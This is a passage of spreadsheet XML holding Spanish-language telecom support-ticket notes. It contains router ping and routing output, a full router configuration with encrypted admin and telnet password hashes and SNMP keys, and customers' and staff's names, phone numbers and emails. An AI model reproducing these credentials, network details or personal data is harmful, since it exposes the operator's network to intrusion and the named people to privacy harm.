DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.152.4.53/32  DIRECT  0    0                 0.0.0.0         VLANIF1050			</t>
  </si>
  <si>
    <t>F4563774</t>
  </si>
  <si>
    <t>ENLACE  SE OBSERVA OPERATIVO
PE 10.179.30.19
&lt;SSSASVYDN3D1EID1&gt;PING -VPN-INSTANCE BA_VPN 10.166.21.185
  PING 10.166.21.185: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.166.21.185: BYTES=56 SEQUENCE=1 TTL=254 TIME=2 MS
    REPLY FROM 10.166.21.185: BYTES=56 SEQUENCE=2 TTL=254 TIME=1 MS
    REPLY FROM 10.166.21.185: BYTES=56 SEQUENCE=3 TTL=254 TIME=1 MS
    REPLY FROM 10.166.21.185: BYTES=56 SEQUENCE=4 TTL=254 TIME=1 MS
    REPLY FROM 10.166.21.185: BYTES=56 SEQUENCE=5 TTL=254 TIME=1 MS
  --- 10.166.21.185 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS</t>
  </si>
  <si>
    <t>F4563789</t>
  </si>
  <si>
    <t>SE ADJUNJTA INFORMACION DEL ROUTER SE PORCEDE CON CIERRE
&lt;IP2164006&gt;DISPLAY CURRENT-CONFIGURATION
[V300R019C13SPC200]
#
 SYSNAME IP2164006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CERTIFICATE-CHECK NONE
#
SSL POLICY DEFAULT_POLICY TYPE SERVER
 PKI-REALM DEFAULT
 VERSION TLS1.2
 CIPHERSUITE RSA_AES_128_SHA256 RSA_AES_256_SHA256 ECDHE_RSA_AES128_GCM_SHA256 ECDHE_RSA_AES256_GCM_SHA384
#
ACL NUMBER 2000
 RULE 5 PERMIT SOURCE 10.55.197.0 0.0.0.255
 RULE 10 DENY
ACL NUMBER 2097
 DESCRIPTION SNMP_FILTER
 RULE 5 PERMIT SOURCE 10.95.61.11 0
 RULE 10 PERMIT SOURCE 10.95.61.15 0
 RULE 15 PERMIT SOURCE 10.95.61.31 0
 RULE 20 PERMIT SOURCE 201.247.246.11 0
 RULE 25 PERMIT SOURCE 201.247.156.100 0
 RULE 30 PERMIT SOURCE 201.247.156.93 0
ACL NUMBER 2098
 DESCRIPTION TELNET_FILTER
 RULE 5 PERMIT SOURCE 10.95.61.100 0
 RULE 10 PERMIT SOURCE 201.247.153.253 0
 RULE 15 PERMIT SOURCE 10.95.61.11 0
 RULE 20 PERMIT SOURCE 10.95.60.250 0
 RULE 25 PERMIT SOURCE 201.247.246.11 0
 RULE 30 PERMIT SOURCE 168.243.136.20 0
ACL NUMBER 2988
 DESCRIPTION MONITOREO DE CLARO
 RULE 5 PERMIT SOURCE 10.255.24.144 0.0.0.7
 RULE 10 PERMIT SOURCE 190.148.15.192 0.0.0.15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DOMAIN DEFAULT
  AUTHENTICATION-SCHEME DEFAULT
  ACCOUNTING-SCHEME DEFAULT
  RADIUS-SERVER DEFAULT
 DOMAIN DEFAULT_ADMIN
  AUTHENTICATION-SCHEME DEFAULT
  ACCOUNTING-SCHEME DEFAULT
 LOCAL-USER ADMIN PASSWORD IRREVERSIBLE-CIPHER $1A$VC1%7;2FQN$.5N|&gt;5TY`WQ}Y#17T91*AL~=-]S"XM!@AJENRA';$
 LOCAL-USER ADMIN PRIVILEGE LEVEL 15
 LOCAL-USER ADMIN SERVICE-TYPE TERMINAL HTTP
 LOCAL-USER T3LN0CR3D3S PASSWORD IRREVERSIBLE-CIPHER $1A$XGX'EF71,L$\"&gt;0Q3XPD-@7DQVOI=H"IMZJ2[;GVT*&gt;#O6AD(Q)$
 LOCAL-USER T3LN0CR3D3S PRIVILEGE LEVEL 15
 LOCAL-USER T3LN0CR3D3S SERVICE-TYPE TELNET TERMINAL SSH FTP X25-PAD HTTP
#
WEB
 SET FAST-CONFIGURATION STATE DISABLE
 USER-SET DEFAULT
 USER-SET VIP
#
FIREWALL ZONE LOCAL
#
INTERFACE VLANIF1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 172.19.137.33 255.255.255.240
#
INTERFACE ETHERNET0/0/0
#
INTERFACE GIGABITETHERNET0/0/0
#
INTERFACE GIGABITETHERNET0/0/1
#
INTERFACE GIGABITETHERNET0/0/2
#
INTERFACE GIGABITETHERNET0/0/3
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION WAN PRINCIPAL/_/IP2164006SV/_/
 SET FLOW-STAT INTERVAL 30
 IP ADDRESS 10.152.243.27 255.255.255.248
 OSPF NETWORK-TYPE NBMA
 OSPF DR-PRIORITY 0
 OSPF TIMER HELLO 3 CONSERVATIVE
 OSPF TIMER DEAD 9
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION VIRTUALPORT
#
INTERFACE WLAN-BSS7
 PORT HYBRID TAGGED VLAN 1
#
INTERFACE CELLULAR0/0/0
 DIALER ENABLE-CIRCULAR
 DIALER-GROUP 1
 APN-PROFILE APN
 DIALER TIMER AUTODIAL 10
 MODEM AUTO-RECOVERY DIAL ACTION MODEM-REBOOT FAIL-TIMES 128
 MODEM AUTO-RECOVERY SERVICES-UNAVAILABLE ACTION MODEM-REBOOT TEST-TIMES 0 INTERVAL 3600
 IP ADDRESS NEGOTIATE
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO CNOC
 IP ADDRESS 10.166.0.162 255.255.255.255
#
INTERFACE TUNNEL0/0/0
 DESCRIPTION MP230108077S - PIVOT ROMA
 IP ADDRESS 192.168.11.226 255.255.255.252
 TUNNEL-PROTOCOL GRE
 SOURCE CELLULAR0/0/0
 DESTINATION 10.130.40.161
#
INTERFACE TUNNEL0/0/1
 DESCRIPTION MP222801126S - PIVOT CAMPESTRE
 IP ADDRESS 192.168.14.226 255.255.255.252
 TUNNEL-PROTOCOL GRE
 SOURCE CELLULAR0/0/0
 DESTINATION 10.130.73.249
#
DIALER-RULE
 DIALER-RULE 1 IP PERMIT
#
APN PROFILE APN
 APN AGRICOLA.CLARO.SV
#
CELLULAR PROFILE DEFAULT
 MODEM AUTO-RECOVERY DIAL ACTION MODEM-REBOOT FAIL-TIMES 128
 MODEM AUTO-RECOVERY ICMP-UNREACHABLE ACTION MODEM-REBOOT
 MODEM AUTO-RECOVERY SERVICES-UNAVAILABLE ACTION MODEM-REBOOT TEST-TIMES 0 INTERVAL 3600
#
OSPF 50331 ROUTER-ID 10.152.243.27
 FILTER-POLICY IP-PREFIX DEFAULT IMPORT
 PEER 10.152.243.25
 AREA 0.0.0.0
  NETWORK 10.152.243.24 0.0.0.7
  NETWORK 10.166.0.162 0.0.0.0
  NETWORK 172.19.137.32 0.0.0.15
#
OSPF 50361 ROUTER-ID 192.168.11.226
 FILTER-POLICY IP-PREFIX DEFAULT IMPORT
 IMPORT-ROUTE DIRECT ROUTE-POLICY LAN
 AREA 0.0.0.0
  NETWORK 192.168.11.224 0.0.0.3
#
OSPF 50362 ROUTER-ID 192.168.14.226
 FILTER-POLICY IP-PREFIX DEFAULT IMPORT
 IMPORT-ROUTE DIRECT ROUTE-POLICY LAN
 AREA 0.0.0.0
  NETWORK 192.168.14.224 0.0.0.3
#
ROUTE-POLICY LAN PERMIT NODE 10
 IF-MATCH IP-PREFIX LAN_AGRICOLA
#
 INFO-CENTER LOGHOST SOURCE LOOPBACK5
#
UNDO ICMP NAME TIMESTAMP-REQUEST RECEIVE
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB04487561776569
 SNMP-AGENT COMMUNITY READ %^%#C['QIR[R=0U(TI&amp;2GDM.G1CY/P8'B=T:ASVXL!&gt;Y{}|&lt;+[UMF/=$XW=XODZ(6AFP%L+28&lt;=3HTNUAMC!%^%# ACL 2988
 SNMP-AGENT SYS-INFO VERSION ALL
 SNMP-AGENT GROUP V3 SNMP_G2 PRIVACY WRITE-VIEW VIEWDEFAULT NOTIFY-VIEW VIEWDEFAULT ACL 2000
 SNMP-AGENT TARGET-HOST TRAP-HOSTNAME TRAPSRV1 ADDRESS 10.55.197.38 UDP-PORT 162 TRAP-PARAMSNAME TRAPPARAMS
 SNMP-AGENT TARGET-HOST TRAP-HOSTNAME TRAPSRV2 ADDRESS 10.55.197.30 UDP-PORT 162 TRAP-PARAMSNAME TRAPPARAMS
 SNMP-AGENT TARGET-HOST TRAP-HOSTNAME TRAPSRV3 ADDRESS 10.55.197.19 UDP-PORT 162 TRAP-PARAMSNAME TRAPPARAMS
 SNMP-AGENT TARGET-HOST TRAP-PARAMSNAME TRAPPARAMS V3 SECURITYNAME %^%#IYQ;IF6GRBT+SC&lt;~2QH(MRDE3#OW{*G(|%/[E6LP%^%# PRIVACY
 SNMP-AGENT USM-USER V3 MONBCOAGRICOLA
 SNMP-AGENT USM-USER V3 MONBCOAGRICOLA GROUP SNMP_G2
 SNMP-AGENT USM-USER V3 MONBCOAGRICOLA AUTHENTICATION-MODE MD5 %^%#'SKP4V&lt;XI,Q8J5USA1GQ0S644`F&amp;R8I2;F~!P~Y5%^%#
 SNMP-AGENT USM-USER V3 MONBCOAGRICOLA PRIVACY-MODE AES128 %^%#()=J/).FIC.VWNJNQ,+:=#&amp;!LZYEQP}H4K0UR3W,%^%#
 SNMP-AGENT TRAP SOURCE LOOPBACK5
 SNMP-AGENT TRAP ENABLE
 SNMP-AGENT TRAP QUEUE-SIZE 200
 SNMP-AGENT TRAP LIFE 180
 SNMP-AGENT
#
 TELNET SERVER ENABLE
 TELNET SERVER PERMIT INTERFACE ALL
#
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SECURE-SERVER ENABLE
 HTTP SERVER PERMIT INTERFACE GIGABITETHERNET0/0/0 WLAN-RADIO0/0/0
#
IP IP-PREFIX DEFAULT INDEX 10 PERMIT 0.0.0.0 0
IP IP-PREFIX LAN_AGRICOLA INDEX 10 PERMIT 172.19.137.32 28
#
IP ROUTE-STATIC 10.130.40.161 255.255.255.255 CELLULAR0/0/0
IP ROUTE-STATIC 10.130.73.249 255.255.255.255 CELLULAR0/0/0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MS-CHANNEL
#
RETURN
************************************************************______************************************************************
 11/05/2022 05:54:28 GUATEMALA/CENTRO AMERICA (PERLA MARINA ESTRADA PACAY):
SE OBSERVAN EQUPOS ASOCIADOS AL ROUTER DEL CLIENTE
&lt;IP2164006&gt;DISPLAY IP INTERFACE BRIEF
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 8
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 1
THE NUMBER OF INTERFACE THAT IS UP IN PROTOCOL IS 7
THE NUMBER OF INTERFACE THAT IS DOWN IN PROTOCOL IS 2
INTERFACE                         IP ADDRESS/MASK      PHYSICAL   PROTOCOL
CELLULAR0/0/0                     10.255.78.132/32     UP         UP
ETHERNET0/0/0                     UNASSIGNED           DOWN       DOWN
GIGABITETHERNET0/0/4              10.152.243.27/29     UP         UP
GIGABITETHERNET0/0/5              UNASSIGNED           UP         DOWN
LOOPBACK5                         10.166.0.162/32      UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
TUNNEL0/0/0                       192.168.11.226/30    UP         UP
TUNNEL0/0/1                       192.168.14.226/30    UP         UP
VLANIF1                           172.19.137.33/28     UP         UP
&lt;IP2164006&gt;DISPLAY ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                    VLAN/CEVLAN(SIP/DIP)      PVC
------------------------------------------------------------------------------
10.152.243.27   5C64-7A04-E80C            I -         GE0/0/4
10.152.243.25   4857-0275-5F39  20        D-0         GE0/0/4
172.19.137.33   5C64-7A04-E80B            I -         VLANIF1
172.19.137.35   E430-220B-372A  9         D-0         GE0/0/3
                                             1/-
172.19.137.34   0007-3264-6848  20        D-0         GE0/0/2
                                             1/-
------------------------------------------------------------------------------
TOTAL:5         DYNAMIC:3       STATIC:0     INTERFACE:2
PE: 10.179.30.36
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BA_VPN 10.152.243.27
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BA_VPN
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.152.243.24/29  DIRECT  0    0             D   10.152.243.25   VLANIF127
ENLACE SE ENCUENTRA UP
&lt;LJUASVYNN1D1EID1&gt;PING -M 10  -VPN BA_VPN 10.152.243.27
  PING 10.152.243.27: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.152.243.27: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.152.243.27: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.152.243.27: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.152.243.27: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.152.243.27: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.152.243.27 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS</t>
  </si>
  <si>
    <t xml:space="preserve">SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PORCEDE ON CIERRE DE TTK
NO SE TIENE GESTION DEL CPE
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BA_VPN 10.152.243.27
  PING 10.152.243.27: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.152.243.27 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.30.36
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BA_VPN 10.152.243.27
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BA_VPN
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.152.243.27/32  DIRECT  0    0                 0.0.0.0         VLANIF1271	</t>
  </si>
  <si>
    <t>F4563795</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL RESPONDE WALTER QUIEN CONFIRMA LA DIRECCION
BOUTIKE SALON CONSENTIDA 13 AV. 28-74 Z.7 BETHANIA LOCALES 1 Y 2
-ID 1001637025</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO 5B INDICA QUE ESTA EN PROGRESO VISITA DEL SUPERVISOR PARA VALIDAR EQUIPOS.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 17:11
FIN: HOY, 17:14
DURACIÓN: 2:05
ID DE LLAMADA: 3001018144</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE TAVSA CON LA CONFIRMACION DE LA VISITA PARA LAS 10.00 AM
DE: OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;
ENVIADO: LUNES, 23 DE MAYO DE 2022 18:43
PARA: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; CARLOS ESTUARDO LEIVA RAMIREZ &lt;CARLOSE.LEIVA@CLARO.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;
ASUNTO: RE: CAJEROS ATM ATM3747 CAIDA DE SERVICIO
BUEN DÍA
ENTERADOS SE CONFIRMA VISITA DE ATM 3747 PARA LAS 10:00</t>
  </si>
  <si>
    <t>F4563864</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE SOLICITANDO PERMISOS DE ACCESO.
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;ENVIADO: MARTES, 24 DE MAYO DE 2022 17:42PARA: AG443@BANRURAL.COM.GT &lt;AG443@BANRURAL.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC-TELE-TEC@BANRURAL.COM.GT &lt;TIC-TELE-TEC@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;; TIC ORELLANA, FRANKLIN &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;ASUNTO: 8901358T || AG443 || BANRURAL || ENLACE REDUNDANTE
BUENAS TARDES, ESTIMADO CLIENTE.
DANDO SEGUIMIENTO AL CASO REPORTADO POR MONITOREO PROACTIVO, EN NECESARIO REALIZAR UNA VISITA TÉCNICA PARA LA REVISIÓN DEL MISMO, SE ADJUNTA INFORMACIÓN DE TÉCNICOS QUE HAN SIDO ASIGNADOS A LA REVISIÓN Y REPARACIÓN DEL ENLACE. QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
CARLOS GUILLERMO GARCIA FUENTES    1918 37377 1107 5826 1939 580015
ALVARO JOSE CHAMALE FIGUEROA          2413 65147 0114 5826 4656 532978
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4563904</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS SOLARES AL 59669635 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 2001586043
**</t>
  </si>
  <si>
    <t>F4563925</t>
  </si>
  <si>
    <t>CLIENTE SE COMUNICA Y NOS COMENTA QUE  SE PERCATO QUE UN  CABLE ESTABA CONECTADO EN UN PUERTO INCORRECTO- EL SERVICIO YA ESTA RESTABLECIDO ##VALIDA CIERRE## SE PROCEDE A  CANCELAR VISITA TECNICA-
&lt;MZTNGTMZN1T1A19A02EIM2&gt;PING -C 1500 -S 1500 -M 30 -B -VPN-INSTANCE  IP_PBX_ACCESO  10.72.246.36
  PING 10.72.246.36: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.72.246.36 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 11/12/21 MS
&lt;MZTNGTMZN1T1A19A02EIM2&gt;
EXP USRINF:ENTITYPE=PCSCF,IMPU="TEL:+50277900200";
GNCYGTGV_GUARDA_VIEJO_ABAJO_CSCF
+++    CSCF/*MEID:5 MENAME:GNCYGTGV_GUARDA_VIEJO_ABAJO_CSCF*/        2022-05-15 10:02:46-06:00
O&amp;M    #766430
%%/*1879567035 MEID=005*/EXP USRINF: ENTITYPE=PCSCF,IMPU="TEL:+50277900200";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
                      IMPI  =  +50277900200@IMSHWI.CLARO.COM.GT
                      IMPU  =  TEL:+50277900200
                SCU NUMBER  =  124
            REGISTER STATE  =  REGISTERED
             REGISTER TIME  =  1200
             RESIDUAL TIME  =  1108
      SERVICE-ROUTE HEADER  =  &lt;SIP:ORIG@GVSCSCF1.IMSHWI.CLARO.COM.GT;LR;DPT=7CF4_D576C246;CA=FFFFFFFF&gt;
           CONTACT ADDRESS  =  &lt;SIP:+50277900200@10.16.109.250:57849;TRANSPORT=UDP;ANN=FIXED-ACCESS_1&gt;;Q=1.0;EXPIRES=1200
         ACCESS NETWORK ID  =  2
USER EQUIPMENT ACCESS TYPE  =  NOT_IMS_UE
         USER SUBSCRIBE ID  =  NULL
           USER SESSION ID  =  NULL
                USER AGENT  =  HIPATH 3000 M5T SIP STACK/4.0.2
       ORIGINAL IP ADDRESS  =  10.72.246.36
               IFC UNSAVED  =  NO
(NUMBER OF RESULTS = 1)
---    END</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA- BENJAMIN HERNANDEZ-58658950
2001502153
COLA:
NOMBRE: A: 58658950
NÚMERO: 58658950
DURACIÓN: 0:00:35
ESTADO: CONECTADA
DETALLES: 58658950
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 15/05/2022 09:05:29</t>
  </si>
  <si>
    <t>F4563933</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 15 DE MAYO DE 2022 9:23PARA: WGABRIEL@BACCREDOMATIC.GT &lt;WGABRIEL@BACCREDOMATIC.GT&gt;; TELEMATICAGT@CREDOMATIC.COM &lt;TELEMATICAGT@CREDOMATIC.COM&gt;; CESOLARES@BACCREDOMATIC.GT &lt;CESOLARES@BACCREDOMATIC.GT&gt;; TELEMATICAGT@CREDOMATIC.COM &lt;TELEMATICAGT@CREDOMATIC.COM&gt;; FELIPE ESTUARDO SAQUICH COYOY &lt;FESAQUICH@BACCREDOMATIC.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE DE INTERNET ALARMADO PARA CLIENTE "CC_CREDOMATIC_GT_INTERNET_AGENCIA_008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3933
ID: 17400380T
IDENTIFICADOR DEL CLIENTE:  CC_CREDOMATIC_GT_INTERNET_AGENCIA_0084
UBICADO EN:  INTERNET_14 AVE. A-27, ZONA 1, QUETZALTENANGO, QUETZALTENANGO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4564001</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 51745290 CONTESTAN PERO DEJAN LLAMADA EN ESPERA Y NO RETOMAN LLAMADA  SE INTENTARA LUEGO **
ID 2001682717
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 51745290 CONTESTA LA SEÑORITA LIDIA RAMOS  PERO NO ESCUCHA SE CORTA LLAMADA SE INTENTA NUEVAMENTE Y NO RESPONDE**
ID 2001615119 - 2001616698
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 51745290 CONTESTA UNA SEÑORITA PIDE UN MOMENTO PERO NO RETOMA LLAMADA || SE INTENTARA LUEGO **
ID 2001587087
**</t>
  </si>
  <si>
    <t>SOLICITUD DE SOPORTE ::: ID LOCAL 426100009T ::: IMBBL003902 ::: LINK DOWN
SE NOTIFICA AL CLIENTE VIA CORREO</t>
  </si>
  <si>
    <t>F4564011</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDREA YOC-35940256 || ENVIA DIRECTO A BUZON ## SE RETOMARA CASO EL DIA DE MAÑANA, SEGUN LO QUE COLOCO CC FUE:
************************************************************______************************************************************
 15/05/2022 10:49:28 GUATEMALA/CENTRO AMERICA (GUSTAVO ADOLFO BARAHONA PATUL):
SE CONTACTA CON ANDREA YOC AL 35940256 ID 2001514505 EN EL QUE CONFIRMA QUE SU SERVICIO ESTABA OPERATIVO, PERO EL DÍA DE AYER 14/05/2022 BRINDA NUEVAMENTE INCIDENCIAS AL GENERAR LLAMADAS NO TIENE EL DATOS EXACTO DEL ERROR YA QUE SE LO REPORTARON Y COMO ESTA DE DESCANSO NO PUEDE VALIDAR LOS DETALLES, POR LOS DATOS BRINDADOS Y EL ERROR PERSISTE, SE PROCEDE APERTURAR NUEVA FALLA F4564011 FALLA ANTERIOR F4562865 FAVOR DE HACER LAS PRUEBAS EN CONJUNTO EL DÍA LUNES 16/05/2022 A LAS 08:00 HORAS.
2001516424
COLA:
NOMBRE: A: 35940256
NÚMERO: 35940256
DURACIÓN: 0:00:33
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 35940256
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 15/05/2022 11:00:53
2001516483
COLA:
NOMBRE: A: 35940256
NÚMERO: 35940256
DURACIÓN: 0:00:32
ESTADO: CONECTADA
DETALLES: 35940256
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 15/05/2022 11:01:24</t>
  </si>
  <si>
    <t>### SE HA CONTACTADO A CLIENTE A CLIENTE ANDREA YOC-35940256 ###  CLIENTE VERIFICARA A NIVEL INTERNO EL CABLEADO ##VALIDA CIERRE ##</t>
  </si>
  <si>
    <t>F4564021</t>
  </si>
  <si>
    <t>**SE LLAMO A CLIENTE RUBI CHAVARRIA 30130082 CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
ID 2001619419
**</t>
  </si>
  <si>
    <t>**SE LLAMO A CLIENTE RUBI CHAVARRIA 30130082 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001598117
**</t>
  </si>
  <si>
    <t>F4564074</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE 525551745299 MENCIONA QUE YA TIENEN CERRADO EL TICKET INTERNO
-ID 2001718444</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 525551745299 CONTESTAN PERO DEJAN EN ESPERA Y NO RETOMAN LLAMADA || SE INTENTARA LUEGO **
ID 2001599000
**</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: DOMINGO, 15 DE MAYO DE 2022 13:28
